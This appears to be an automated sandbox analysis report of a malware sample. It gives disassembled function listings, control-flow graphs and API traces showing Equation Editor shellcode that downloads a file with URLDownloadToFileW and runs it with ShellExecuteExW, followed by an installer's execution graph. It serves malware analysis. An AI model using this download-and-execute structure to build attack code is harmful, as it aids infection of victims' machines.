                                            • Part of subcall function 035D0555: ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileProcessShell
                                          • String ID: <
                                          • API String ID: 3584569557-4251816714
                                          • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                          • Instruction ID: bf64f3cc1cd52e316383634034718274ab66448eaa04c0d27d91a86e0c813b8b
                                          • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                          • Instruction Fuzzy Hash: FB01F2E540D3805AD371EB38E8987AABFE0BFC0210F0409599C86871F2D938C5048B06
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D0555 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 222 35d0555-35d0557 224 35d055c-35d0562 222->224 225 35d0557 call 35d056c 222->225 226 35d05c9-35d05cd 224->226 227 35d0564-35d0569 224->227 225->224 228 35d05cf 226->228 229 35d05f8-35d0601 226->229 230 35d056b-35d0581 ShellExecuteExW call 35d058a 227->230 231 35d05c2 227->231 233 35d05d3 228->233 232 35d05c5-35d05c8 229->232 230->233 245 35d0583 230->245 231->232 235 35d05ca-35d05cd 232->235 236 35d0603 232->236 237 35d05db-35d05df 233->237 238 35d05d5-35d05d9 233->238 235->228 235->229 240 35d0606-35d0607 236->240 242 35d05f4-35d05f6 237->242 243 35d05e1-35d05e5 237->243 238->237 241 35d05e7-35d05ee 238->241 246 35d05f0 241->246 247 35d05f2 241->247 242->240 243->241 243->242 245->242 248 35d0585-35d058f ExitProcess 245->248 246->242 247->229
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExecuteExitProcessShell
                                          • String ID:
                                          • API String ID: 1124553745-0
                                          • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                          • Instruction ID: 0d5a1e84642a8be351b85d6d3b64bc84072ae325e1da5e38c87cfad7f109e566
                                          • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                          • Instruction Fuzzy Hash: 6C01ADD848930664DA70F62CE4481BAAE90FB91710FDC8997AC92470F5D5289583CB2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D056C Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 251 35d056c-35d0577 ShellExecuteExW 253 35d057e-35d0581 251->253 254 35d0579 call 35d058a 251->254 256 35d05d3 253->256 257 35d0583 253->257 254->253 260 35d05db-35d05df 256->260 261 35d05d5-35d05d9 256->261 258 35d0585-35d058f ExitProcess 257->258 259 35d05f4-35d05f6 257->259 263 35d0606-35d0607 259->263 260->259 265 35d05e1-35d05e5 260->265 261->260 264 35d05e7-35d05ee 261->264 266 35d05f0 264->266 267 35d05f2 264->267 265->259 265->264 266->259 268 35d05f8-35d0601 267->268 271 35d05ca-35d05cd 268->271 272 35d0603 268->272 271->268 273 35d05cf 271->273 272->263 273->256
                                          APIs
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                            • Part of subcall function 035D058A: ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExecuteExitProcessShell
                                          • String ID:
                                          • API String ID: 1124553745-0
                                          • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                          • Instruction ID: 02e4f7d7e9c92e7be568e5f9e9500d68baf318374b069b6d454dd16fdcc6d84e
                                          • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                          • Instruction Fuzzy Hash: EDF0AFC998424251DB30E66CF8556FAAF55FB91310FCC88979C92470F5D52891C38B6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D058A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 274 35d058a-35d058f ExitProcess
                                          APIs
                                          • ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                          • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                          • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D0591 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 276 35d0591-35d059c GetPEB 277 35d059f-35d05b0 call 35d05b9 276->277 280 35d05b2-35d05b6 277->280
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                          • Instruction ID: e6497bfa2f2ab9d4b1b03695e82783f70b9e7a22076a485739677ca4449748a3
                                          • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                          • Instruction Fuzzy Hash: 4ED05EB5201502CFC314EB08D940E12F37AFFC8211F14C264E4004B669C330E891CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 035D03E5 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 281 35d03e5-35d040c ExitProcess call 35d03fe 284 35d045f-35d047b 281->284 285 35d040f 281->285 289 35d047c-35d047e 284->289 286 35d0411-35d0414 285->286 287 35d0480-35d0488 285->287 286->289 290 35d0417 286->290 291 35d048c-35d0496 call 35d04a4 287->291 289->287 290->291 292 35d0419-35d041c 290->292 295 35d0498-35d0505 call 35d050b 291->295 296 35d0506 291->296 292->284 298 35d0507-35d0562 URLDownloadToFileW call 35d0555 call 35d056c 295->298 296->298 308 35d05c9-35d05cd 298->308 309 35d0564-35d0569 298->309 310 35d05cf 308->310 311 35d05f8-35d0601 308->311 312 35d056b-35d0581 ShellExecuteExW call 35d058a 309->312 313 35d05c2 309->313 315 35d05d3 310->315 314 35d05c5-35d05c8 311->314 312->315 327 35d0583 312->327 313->314 317 35d05ca-35d05cd 314->317 318 35d0603 314->318 319 35d05db-35d05df 315->319 320 35d05d5-35d05d9 315->320 317->310 317->311 322 35d0606-35d0607 318->322 324 35d05f4-35d05f6 319->324 325 35d05e1-35d05e5 319->325 320->319 323 35d05e7-35d05ee 320->323 328 35d05f0 323->328 329 35d05f2 323->329 324->322 325->323 325->324 327->324 330 35d0585-35d058f ExitProcess 327->330 328->324 329->311
                                          APIs
                                          • ExitProcess.KERNEL32(035D03D3), ref: 035D03E5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 0576eebe9327ac3463b2cf115f2459228ef26862ba91320d0537bede91d031dc
                                          • Instruction ID: dffc8af2f70df689c8cb2743f028308e893a9d5dee391408388ea44fa20c41ac
                                          • Opcode Fuzzy Hash: 0576eebe9327ac3463b2cf115f2459228ef26862ba91320d0537bede91d031dc
                                          • Instruction Fuzzy Hash: E8E0DF1480E7C15FC622E37C3AAA464BF30BE47100F2808EA80820F0B3E066876A93D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:16.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:16.3%
                                          Total number of Nodes:1372
                                          Total number of Limit Nodes:22
                                          execution_graph 3058 401941 3059 401943 3058->3059 3064 402da6 3059->3064 3065 402db2 3064->3065 3106 4066ab 3065->3106 3068 401948 3070 405d7a 3068->3070 3148 406045 3070->3148 3073 405da2 DeleteFileW 3103 401951 3073->3103 3074 405db9 3076 405ed9 3074->3076 3162 40666e lstrcpynW 3074->3162 3076->3103 3191 4069a4 FindFirstFileW 3076->3191 3077 405ddf 3078 405df2 3077->3078 3079 405de5 lstrcatW 3077->3079 3163 405f89 lstrlenW 3078->3163 3080 405df8 3079->3080 3083 405e08 lstrcatW 3080->3083 3085 405e13 lstrlenW FindFirstFileW 3080->3085 3083->3085 3085->3076 3086 405e35 3085->3086 3089 405ebc FindNextFileW 3086->3089 3099 405d7a 60 API calls 3086->3099 3102 4056d0 24 API calls 3086->3102 3167 40666e lstrcpynW 3086->3167 3168 405d32 3086->3168 3176 4056d0 3086->3176 3187 40642e MoveFileExW 3086->3187 3089->3086 3092 405ed2 FindClose 3089->3092 3090 405d32 5 API calls 3093 405f14 3090->3093 3092->3076 3094 405f18 3093->3094 3095 405f2e 3093->3095 3098 4056d0 24 API calls 3094->3098 3094->3103 3097 4056d0 24 API calls 3095->3097 3097->3103 3100 405f25 3098->3100 3099->3086 3101 40642e 36 API calls 3100->3101 3101->3103 3102->3089 3110 4066b8 3106->3110 3107 4068db 3108 402dd3 3107->3108 3139 40666e lstrcpynW 3107->3139 3108->3068 3123 4068f5 3108->3123 3110->3107 3111 4068a9 lstrlenW 3110->3111 3115 4066ab 10 API calls 3110->3115 3116 4067c0 GetSystemDirectoryW 3110->3116 3117 4067d3 GetWindowsDirectoryW 3110->3117 3118 406802 SHGetSpecialFolderLocation 3110->3118 3119 40684a lstrcatW 3110->3119 3120 4066ab 10 API calls 3110->3120 3121 4068f5 5 API calls 3110->3121 3132 40653c 3110->3132 3137 4065b5 wsprintfW 3110->3137 3138 40666e lstrcpynW 3110->3138 3111->3110 3115->3111 3116->3110 3117->3110 3118->3110 3122 40681a SHGetPathFromIDListW CoTaskMemFree 3118->3122 3119->3110 3120->3110 3121->3110 3122->3110 3124 406902 3123->3124 3126 406978 3124->3126 3127 40696b CharNextW 3124->3127 3130 406957 CharNextW 3124->3130 3131 406966 CharNextW 3124->3131 3144 405f6a 3124->3144 3125 40697d CharPrevW 3125->3126 3126->3125 3128 40699e 3126->3128 3127->3124 3127->3126 3128->3068 3130->3124 3131->3127 3140 4064db 3132->3140 3135 406570 RegQueryValueExW RegCloseKey 3136 4065a0 3135->3136 3136->3110 3137->3110 3138->3110 3139->3108 3141 4064ea 3140->3141 3142 4064f3 RegOpenKeyExW 3141->3142 3143 4064ee 3141->3143 3142->3143 3143->3135 3143->3136 3145 405f70 3144->3145 3146 405f86 3145->3146 3147 405f77 CharNextW 3145->3147 3146->3124 3147->3145 3197 40666e lstrcpynW 3148->3197 3150 406056 3198 405fe8 CharNextW CharNextW 3150->3198 3153 405d9a 3153->3073 3153->3074 3154 4068f5 5 API calls 3160 40606c 3154->3160 3155 40609d lstrlenW 3156 4060a8 3155->3156 3155->3160 3157 405f3d 3 API calls 3156->3157 3159 4060ad GetFileAttributesW 3157->3159 3158 4069a4 2 API calls 3158->3160 3159->3153 3160->3153 3160->3155 3160->3158 3161 405f89 2 API calls 3160->3161 3161->3155 3162->3077 3164 405f97 3163->3164 3165 405fa9 3164->3165 3166 405f9d CharPrevW 3164->3166 3165->3080 3166->3164 3166->3165 3167->3086 3204 406139 GetFileAttributesW 3168->3204 3171 405d5f 3171->3086 3172 405d55 DeleteFileW 3174 405d5b 3172->3174 3173 405d4d RemoveDirectoryW 3173->3174 3174->3171 3175 405d6b SetFileAttributesW 3174->3175 3175->3171 3177 4056eb 3176->3177 3178 40578d 3176->3178 3179 405707 lstrlenW 3177->3179 3180 4066ab 17 API calls 3177->3180 3178->3086 3181 405730 3179->3181 3182 405715 lstrlenW 3179->3182 3180->3179 3184 405743 3181->3184 3185 405736 SetWindowTextW 3181->3185 3182->3178 3183 405727 lstrcatW 3182->3183 3183->3181 3184->3178 3186 405749 SendMessageW SendMessageW SendMessageW 3184->3186 3185->3184 3186->3178 3188 40644f 3187->3188 3189 406442 3187->3189 3188->3086 3207 4062b4 3189->3207 3192 405efe 3191->3192 3193 4069ba FindClose 3191->3193 3192->3103 3194 405f3d lstrlenW CharPrevW 3192->3194 3193->3192 3195 405f08 3194->3195 3196 405f59 lstrcatW 3194->3196 3195->3090 3196->3195 3197->3150 3199 406005 3198->3199 3200 406017 3198->3200 3199->3200 3201 406012 CharNextW 3199->3201 3202 405f6a CharNextW 3200->3202 3203 40603b 3200->3203 3201->3203 3202->3200 3203->3153 3203->3154 3205 405d3e 3204->3205 3206 40614b SetFileAttributesW 3204->3206 3205->3171 3205->3172 3205->3173 3206->3205 3208 4062e4 3207->3208 3209 40630a GetShortPathNameW 3207->3209 3234 40615e GetFileAttributesW CreateFileW 3208->3234 3211 406429 3209->3211 3212 40631f 3209->3212 3211->3188 3212->3211 3214 406327 wsprintfA 3212->3214 3213 4062ee CloseHandle GetShortPathNameW 3213->3211 3215 406302 3213->3215 3216 4066ab 17 API calls 3214->3216 3215->3209 3215->3211 3217 40634f 3216->3217 3235 40615e GetFileAttributesW CreateFileW 3217->3235 3219 40635c 3219->3211 3220 40636b GetFileSize GlobalAlloc 3219->3220 3221 406422 CloseHandle 3220->3221 3222 40638d 3220->3222 3221->3211 3236 4061e1 ReadFile 3222->3236 3227 4063c0 3229 4060c3 4 API calls 3227->3229 3228 4063ac lstrcpyA 3230 4063ce 3228->3230 3229->3230 3231 406405 SetFilePointer 3230->3231 3243 406210 WriteFile 3231->3243 3234->3213 3235->3219 3237 4061ff 3236->3237 3237->3221 3238 4060c3 lstrlenA 3237->3238 3239 406104 lstrlenA 3238->3239 3240 40610c 3239->3240 3241 4060dd lstrcmpiA 3239->3241 3240->3227 3240->3228 3241->3240 3242 4060fb CharNextA 3241->3242 3242->3239 3244 40622e GlobalFree 3243->3244 3244->3221 3245 4015c1 3246 402da6 17 API calls 3245->3246 3247 4015c8 3246->3247 3248 405fe8 4 API calls 3247->3248 3260 4015d1 3248->3260 3249 401631 3251 401663 3249->3251 3252 401636 3249->3252 3250 405f6a CharNextW 3250->3260 3255 401423 24 API calls 3251->3255 3272 401423 3252->3272 3261 40165b 3255->3261 3259 40164a SetCurrentDirectoryW 3259->3261 3260->3249 3260->3250 3262 401617 GetFileAttributesW 3260->3262 3264 405c39 3260->3264 3267 405b9f CreateDirectoryW 3260->3267 3276 405c1c CreateDirectoryW 3260->3276 3262->3260 3279 406a3b GetModuleHandleA 3264->3279 3268 405bf0 GetLastError 3267->3268 3269 405bec 3267->3269 3268->3269 3270 405bff SetFileSecurityW 3268->3270 3269->3260 3270->3269 3271 405c15 GetLastError 3270->3271 3271->3269 3273 4056d0 24 API calls 3272->3273 3274 401431 3273->3274 3275 40666e lstrcpynW 3274->3275 3275->3259 3277 405c30 GetLastError 3276->3277 3278 405c2c 3276->3278 3277->3278 3278->3260 3280 406a61 GetProcAddress 3279->3280 3281 406a57 3279->3281 3283 405c40 3280->3283 3285 4069cb GetSystemDirectoryW 3281->3285 3283->3260 3284 406a5d 3284->3280 3284->3283 3286 4069ed wsprintfW LoadLibraryExW 3285->3286 3286->3284 3760 401c43 3782 402d84 3760->3782 3762 401c4a 3763 402d84 17 API calls 3762->3763 3764 401c57 3763->3764 3765 401c6c 3764->3765 3766 402da6 17 API calls 3764->3766 3767 401c7c 3765->3767 3768 402da6 17 API calls 3765->3768 3766->3765 3769 401cd3 3767->3769 3770 401c87 3767->3770 3768->3767 3771 402da6 17 API calls 3769->3771 3772 402d84 17 API calls 3770->3772 3773 401cd8 3771->3773 3774 401c8c 3772->3774 3775 402da6 17 API calls 3773->3775 3776 402d84 17 API calls 3774->3776 3777 401ce1 FindWindowExW 3775->3777 3778 401c98 3776->3778 3781 401d03 3777->3781 3779 401cc3 SendMessageW 3778->3779 3780 401ca5 SendMessageTimeoutW 3778->3780 3779->3781 3780->3781 3783 4066ab 17 API calls 3782->3783 3784 402d99 3783->3784 3784->3762 3785 405644 3786 405654 3785->3786 3787 405668 3785->3787 3789 4056b1 3786->3789 3790 40565a 3786->3790 3788 405670 IsWindowVisible 3787->3788 3796 405687 3787->3796 3788->3789 3791 40567d 3788->3791 3792 4056b6 CallWindowProcW 3789->3792 3793 404616 SendMessageW 3790->3793 3798 404f85 SendMessageW 3791->3798 3795 405664 3792->3795 3793->3795 3796->3792 3803 405005 3796->3803 3799 404fe4 SendMessageW 3798->3799 3800 404fa8 GetMessagePos ScreenToClient SendMessageW 3798->3800 3801 404fdc 3799->3801 3800->3801 3802 404fe1 3800->3802 3801->3796 3802->3799 3812 40666e lstrcpynW 3803->3812 3805 405018 3813 4065b5 wsprintfW 3805->3813 3807 405022 3808 40140b 2 API calls 3807->3808 3809 40502b 3808->3809 3814 40666e lstrcpynW 3809->3814 3811 405032 3811->3789 3812->3805 3813->3807 3814->3811 3815 4028c4 3816 4028ca 3815->3816 3817 4028d2 FindClose 3816->3817 3818 402c2a 3816->3818 3817->3818 3316 403646 SetErrorMode GetVersionExW 3317 4036d0 3316->3317 3318 403698 GetVersionExW 3316->3318 3319 403729 3317->3319 3320 406a3b 5 API calls 3317->3320 3318->3317 3321 4069cb 3 API calls 3319->3321 3320->3319 3322 40373f lstrlenA 3321->3322 3322->3319 3323 40374f 3322->3323 3324 406a3b 5 API calls 3323->3324 3325 403756 3324->3325 3326 406a3b 5 API calls 3325->3326 3327 40375d 3326->3327 3328 406a3b 5 API calls 3327->3328 3329 403769 #17 OleInitialize SHGetFileInfoW 3328->3329 3406 40666e lstrcpynW 3329->3406 3332 4037b6 GetCommandLineW 3407 40666e lstrcpynW 3332->3407 3334 4037c8 3335 405f6a CharNextW 3334->3335 3336 4037ee CharNextW 3335->3336 3346 4037ff 3336->3346 3337 4038fd 3338 403911 GetTempPathW 3337->3338 3408 403615 3338->3408 3340 403929 3341 403983 DeleteFileW 3340->3341 3342 40392d GetWindowsDirectoryW lstrcatW 3340->3342 3418 4030d0 GetTickCount GetModuleFileNameW 3341->3418 3344 403615 12 API calls 3342->3344 3343 405f6a CharNextW 3343->3346 3347 403949 3344->3347 3346->3337 3346->3343 3350 4038ff 3346->3350 3347->3341 3349 40394d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3347->3349 3348 403996 3351 403b72 ExitProcess OleUninitialize 3348->3351 3355 403a4b 3348->3355 3361 405f6a CharNextW 3348->3361 3354 403615 12 API calls 3349->3354 3503 40666e lstrcpynW 3350->3503 3352 403b82 3351->3352 3353 403b97 3351->3353 3508 405cce 3352->3508 3358 403c15 ExitProcess 3353->3358 3359 403b9f GetCurrentProcess OpenProcessToken 3353->3359 3360 40397b 3354->3360 3447 403d1d 3355->3447 3366 403be5 3359->3366 3367 403bb6 LookupPrivilegeValueW AdjustTokenPrivileges 3359->3367 3360->3341 3360->3351 3372 4039b8 3361->3372 3363 403a5a 3363->3351 3368 406a3b 5 API calls 3366->3368 3367->3366 3371 403bec 3368->3371 3369 403a21 3374 406045 18 API calls 3369->3374 3370 403a62 3373 405c39 5 API calls 3370->3373 3375 403c01 ExitWindowsEx 3371->3375 3376 403c0e 3371->3376 3372->3369 3372->3370 3377 403a67 lstrcatW 3373->3377 3378 403a2d 3374->3378 3375->3358 3375->3376 3512 40140b 3376->3512 3380 403a83 lstrcatW lstrcmpiW 3377->3380 3381 403a78 lstrcatW 3377->3381 3378->3351 3504 40666e lstrcpynW 3378->3504 3380->3363 3382 403aa3 3380->3382 3381->3380 3384 403aa8 3382->3384 3385 403aaf 3382->3385 3387 405b9f 4 API calls 3384->3387 3388 405c1c 2 API calls 3385->3388 3386 403a40 3505 40666e lstrcpynW 3386->3505 3390 403aad 3387->3390 3391 403ab4 SetCurrentDirectoryW 3388->3391 3390->3391 3392 403ad1 3391->3392 3393 403ac6 3391->3393 3507 40666e lstrcpynW 3392->3507 3506 40666e lstrcpynW 3393->3506 3396 4066ab 17 API calls 3397 403b13 DeleteFileW 3396->3397 3398 403b1f CopyFileW 3397->3398 3403 403ade 3397->3403 3398->3403 3399 403b69 3400 40642e 36 API calls 3399->3400 3400->3363 3401 40642e 36 API calls 3401->3403 3402 4066ab 17 API calls 3402->3403 3403->3396 3403->3399 3403->3401 3403->3402 3404 405c51 2 API calls 3403->3404 3405 403b53 CloseHandle 3403->3405 3404->3403 3405->3403 3406->3332 3407->3334 3409 4068f5 5 API calls 3408->3409 3411 403621 3409->3411 3410 40362b 3410->3340 3411->3410 3412 405f3d 3 API calls 3411->3412 3413 403633 3412->3413 3414 405c1c 2 API calls 3413->3414 3415 403639 3414->3415 3515 40618d 3415->3515 3519 40615e GetFileAttributesW CreateFileW 3418->3519 3420 403113 3446 403120 3420->3446 3520 40666e lstrcpynW 3420->3520 3422 403136 3423 405f89 2 API calls 3422->3423 3424 40313c 3423->3424 3521 40666e lstrcpynW 3424->3521 3426 403147 GetFileSize 3427 403246 3426->3427 3429 40315e 3426->3429 3522 40302e 3427->3522 3429->3427 3433 4032e4 3429->3433 3441 40302e 32 API calls 3429->3441 3429->3446 3553 4035e8 3429->3553 3431 403289 GlobalAlloc 3436 40618d 2 API calls 3431->3436 3434 40302e 32 API calls 3433->3434 3434->3446 3437 4032b4 CreateFileW 3436->3437 3439 4032ee 3437->3439 3437->3446 3438 40326a 3440 4035e8 ReadFile 3438->3440 3537 4035fe SetFilePointer 3439->3537 3443 403275 3440->3443 3441->3429 3443->3431 3443->3446 3444 4032fc 3538 403377 3444->3538 3446->3348 3448 406a3b 5 API calls 3447->3448 3449 403d31 3448->3449 3450 403d37 3449->3450 3451 403d49 3449->3451 3581 4065b5 wsprintfW 3450->3581 3452 40653c 3 API calls 3451->3452 3453 403d79 3452->3453 3455 403d98 lstrcatW 3453->3455 3457 40653c 3 API calls 3453->3457 3456 403d47 3455->3456 3573 403ff3 3456->3573 3457->3455 3460 406045 18 API calls 3461 403dca 3460->3461 3462 403e5e 3461->3462 3464 40653c 3 API calls 3461->3464 3463 406045 18 API calls 3462->3463 3465 403e64 3463->3465 3466 403dfc 3464->3466 3467 403e74 LoadImageW 3465->3467 3468 4066ab 17 API calls 3465->3468 3466->3462 3471 403e1d lstrlenW 3466->3471 3475 405f6a CharNextW 3466->3475 3469 403f1a 3467->3469 3470 403e9b RegisterClassW 3467->3470 3468->3467 3474 40140b 2 API calls 3469->3474 3472 403ed1 SystemParametersInfoW CreateWindowExW 3470->3472 3473 403f24 3470->3473 3476 403e51 3471->3476 3477 403e2b lstrcmpiW 3471->3477 3472->3469 3473->3363 3478 403f20 3474->3478 3480 403e1a 3475->3480 3479 405f3d 3 API calls 3476->3479 3477->3476 3481 403e3b GetFileAttributesW 3477->3481 3478->3473 3482 403ff3 18 API calls 3478->3482 3483 403e57 3479->3483 3480->3471 3484 403e47 3481->3484 3485 403f31 3482->3485 3582 40666e lstrcpynW 3483->3582 3484->3476 3487 405f89 2 API calls 3484->3487 3488 403fc0 3485->3488 3489 403f3d ShowWindow 3485->3489 3487->3476 3583 4057a3 OleInitialize 3488->3583 3491 4069cb 3 API calls 3489->3491 3495 403f55 3491->3495 3492 403fc6 3493 403fe2 3492->3493 3496 403fca 3492->3496 3497 40140b 2 API calls 3493->3497 3494 403f63 GetClassInfoW 3499 403f77 GetClassInfoW RegisterClassW 3494->3499 3500 403f8d DialogBoxParamW 3494->3500 3495->3494 3498 4069cb 3 API calls 3495->3498 3496->3473 3501 40140b 2 API calls 3496->3501 3497->3473 3498->3494 3499->3500 3502 40140b 2 API calls 3500->3502 3501->3473 3502->3473 3503->3338 3504->3386 3505->3355 3506->3392 3507->3403 3509 405ce3 3508->3509 3510 403b8f ExitProcess 3509->3510 3511 405cf7 MessageBoxIndirectW 3509->3511 3511->3510 3513 401389 2 API calls 3512->3513 3514 401420 3513->3514 3514->3358 3516 40619a GetTickCount GetTempFileNameW 3515->3516 3517 4061d0 3516->3517 3518 403644 3516->3518 3517->3516 3517->3518 3518->3340 3519->3420 3520->3422 3521->3426 3523 403057 3522->3523 3524 40303f 3522->3524 3527 403067 GetTickCount 3523->3527 3528 40305f 3523->3528 3525 403048 DestroyWindow 3524->3525 3526 40304f 3524->3526 3525->3526 3526->3431 3526->3446 3556 4035fe SetFilePointer 3526->3556 3527->3526 3530 403075 3527->3530 3529 406a77 2 API calls 3528->3529 3529->3526 3531 4030aa CreateDialogParamW ShowWindow 3530->3531 3532 40307d 3530->3532 3531->3526 3532->3526 3557 403012 3532->3557 3534 40308b wsprintfW 3535 4056d0 24 API calls 3534->3535 3536 4030a8 3535->3536 3536->3526 3537->3444 3539 4033a2 3538->3539 3540 403386 SetFilePointer 3538->3540 3560 40347f GetTickCount 3539->3560 3540->3539 3543 40343f 3543->3446 3544 4061e1 ReadFile 3545 4033c2 3544->3545 3545->3543 3546 40347f 38 API calls 3545->3546 3547 4033d9 3546->3547 3547->3543 3548 403445 ReadFile 3547->3548 3550 4033e8 3547->3550 3548->3543 3550->3543 3551 4061e1 ReadFile 3550->3551 3552 406210 WriteFile 3550->3552 3551->3550 3552->3550 3554 4061e1 ReadFile 3553->3554 3555 4035fb 3554->3555 3555->3429 3556->3438 3558 403021 3557->3558 3559 403023 MulDiv 3557->3559 3558->3559 3559->3534 3561 4035d7 3560->3561 3562 4034ad 3560->3562 3563 40302e 32 API calls 3561->3563 3572 4035fe SetFilePointer 3562->3572 3569 4033a9 3563->3569 3565 4034b8 SetFilePointer 3568 4034dd 3565->3568 3566 4035e8 ReadFile 3566->3568 3567 40302e 32 API calls 3567->3568 3568->3566 3568->3567 3568->3569 3570 406210 WriteFile 3568->3570 3571 4035b8 SetFilePointer 3568->3571 3569->3543 3569->3544 3570->3568 3571->3561 3572->3565 3574 404007 3573->3574 3590 4065b5 wsprintfW 3574->3590 3576 404078 3591 4040ac 3576->3591 3578 403da8 3578->3460 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3456 3582->3462 3594 404616 3583->3594 3585 4057c6 3589 4057ed 3585->3589 3597 401389 3585->3597 3586 404616 SendMessageW 3587 4057ff OleUninitialize 3586->3587 3587->3492 3589->3586 3590->3576 3592 4066ab 17 API calls 3591->3592 3593 4040ba SetWindowTextW 3592->3593 3593->3579 3595 40462e 3594->3595 3596 40461f SendMessageW 3594->3596 3595->3585 3596->3595 3599 401390 3597->3599 3598 4013fe 3598->3585 3599->3598 3600 4013cb MulDiv SendMessageW 3599->3600 3600->3599 3601 4040cb 3602 4040e3 3601->3602 3603 404244 3601->3603 3602->3603 3606 4040ef 3602->3606 3604 404295 3603->3604 3605 404255 GetDlgItem GetDlgItem 3603->3605 3608 4042ef 3604->3608 3620 401389 2 API calls 3604->3620 3694 4045ca 3605->3694 3609 4040fa SetWindowPos 3606->3609 3610 40410d 3606->3610 3614 404616 SendMessageW 3608->3614 3621 40423f 3608->3621 3609->3610 3611 404116 ShowWindow 3610->3611 3612 404158 3610->3612 3615 404231 3611->3615 3616 404136 GetWindowLongW 3611->3616 3617 404160 DestroyWindow 3612->3617 3618 404177 3612->3618 3613 40427f SetClassLongW 3619 40140b 2 API calls 3613->3619 3622 404301 3614->3622 3680 404631 3615->3680 3616->3615 3623 40414f ShowWindow 3616->3623 3624 404574 3617->3624 3625 40417c SetWindowLongW 3618->3625 3626 40418d 3618->3626 3619->3604 3627 4042c7 3620->3627 3629 40140b 2 API calls 3622->3629 3630 404555 DestroyWindow EndDialog 3622->3630 3635 4066ab 17 API calls 3622->3635 3646 4045ca 18 API calls 3622->3646 3649 4045ca 18 API calls 3622->3649 3623->3612 3624->3621 3633 404584 ShowWindow 3624->3633 3625->3621 3626->3615 3631 404199 GetDlgItem 3626->3631 3627->3608 3632 4042cb SendMessageW 3627->3632 3629->3622 3630->3624 3634 4041aa SendMessageW IsWindowEnabled 3631->3634 3636 4041c7 3631->3636 3632->3621 3633->3621 3634->3621 3634->3636 3635->3622 3637 4041d4 3636->3637 3638 4041e7 3636->3638 3639 40421b SendMessageW 